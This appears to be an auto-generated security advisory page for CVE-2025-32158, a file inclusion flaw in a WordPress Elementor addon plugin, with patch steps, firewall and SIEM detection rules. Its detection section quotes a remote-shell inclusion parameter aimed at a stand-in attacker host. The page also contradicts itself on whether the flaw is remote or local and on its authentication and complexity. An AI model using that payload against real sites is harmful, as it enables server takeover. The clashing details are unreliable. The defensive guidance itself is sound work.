CVE-2025-32158 – This vulnerability allows attackers to include ... (How to Fix)

Q: What is the severity of CVE-2025-32158?

CVE-2025-32158 has a CVSS score of 7.5 (HIGH). This vulnerability allows attackers to include arbitrary PHP files from remote servers in the aThemes Addons for Elementor WordPress plugin. Attackers can execute malicious code on affected WordPress sites, potentially taking full control. All WordPress installations using vulnerable versions of this plugin are affected.

📋 TL;DR

This vulnerability allows attackers to include arbitrary PHP files from remote servers in the aThemes Addons for Elementor WordPress plugin. Attackers can execute malicious code on affected WordPress sites, potentially taking full control. All WordPress installations using vulnerable versions of this plugin are affected.

💻 Affected Systems

Products:

aThemes Addons for Elementor WordPress plugin

Versions: All versions up to and including 1.0.15

Operating Systems: Any OS running WordPress

Default Config Vulnerable: ⚠️ Yes

Notes: Requires WordPress installation with the vulnerable plugin activated.

📦 What is this software?

Athemes Addons For Elementor by Athemes

View all CVEs affecting Athemes Addons For Elementor →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise leading to data theft, ransomware deployment, or website defacement through remote code execution.

🟠

Likely Case

Website defacement, data exfiltration, or installation of backdoors for persistent access.

🟢

If Mitigated

Limited impact if proper file permissions, web application firewalls, and input validation are in place.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Remote file inclusion vulnerabilities are commonly exploited and require minimal technical skill.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.16 or later

Vendor Advisory: https://patchstack.com/database/wordpress/plugin/athemes-addons-for-elementor-lite/vulnerability/wordpress-athemes-addons-for-elementor-plugin-1-0-15-local-file-inclusion-vulnerability?_s_id=cve

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'aThemes Addons for Elementor'. 4. Click 'Update Now' if available. 5. If no update appears, manually download version 1.0.16+ from WordPress.org and replace the plugin files.

🔧 Temporary Workarounds

Disable vulnerable plugin

all

Temporarily deactivate the aThemes Addons for Elementor plugin until patched.

wp plugin deactivate athemes-addons-for-elementor

Web Application Firewall rule

linux

Block requests containing suspicious file inclusion patterns.

ModSecurity rule: SecRule ARGS "@rx (?:\\.\\.|php://|http://|ftp://)" "id:1001,phase:2,deny,status:403"

🧯 If You Can't Patch

Remove the plugin entirely and find alternative Elementor addons
Implement strict file permissions (755 for directories, 644 for files) and disable allow_url_include in php.ini

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > aThemes Addons for Elementor version. If version is 1.0.15 or lower, you are vulnerable.

Check Version:

wp plugin get athemes-addons-for-elementor --field=version

Verify Fix Applied:

Verify plugin version is 1.0.16 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

Unusual PHP include/require statements in web server logs
Requests with suspicious parameters like ?file=http://malicious.com/shell.php

Network Indicators:

Outbound connections to unexpected domains following suspicious requests
Unusual file upload patterns

SIEM Query:

source="web_server.log" AND ("include" OR "require") AND ("http://" OR "ftp://" OR "php://")

📊 Metadata

CVE ID: CVE-2025-32158

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-98

EPSS Score: 0.48% exploit probability (64.3th percentile)

Published: April 10, 2025

Last Updated: May 29, 2025

🔗 References

https://patchstack.com/database/wordpress/plugin/athemes-addons-for-elementor-lite/vulnerability/wordpress-athemes-addons-for-elementor-plugin-1-0-15-local-file-inclusion-vulnerability?_s_id=cve Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-32158, you might also want to check these: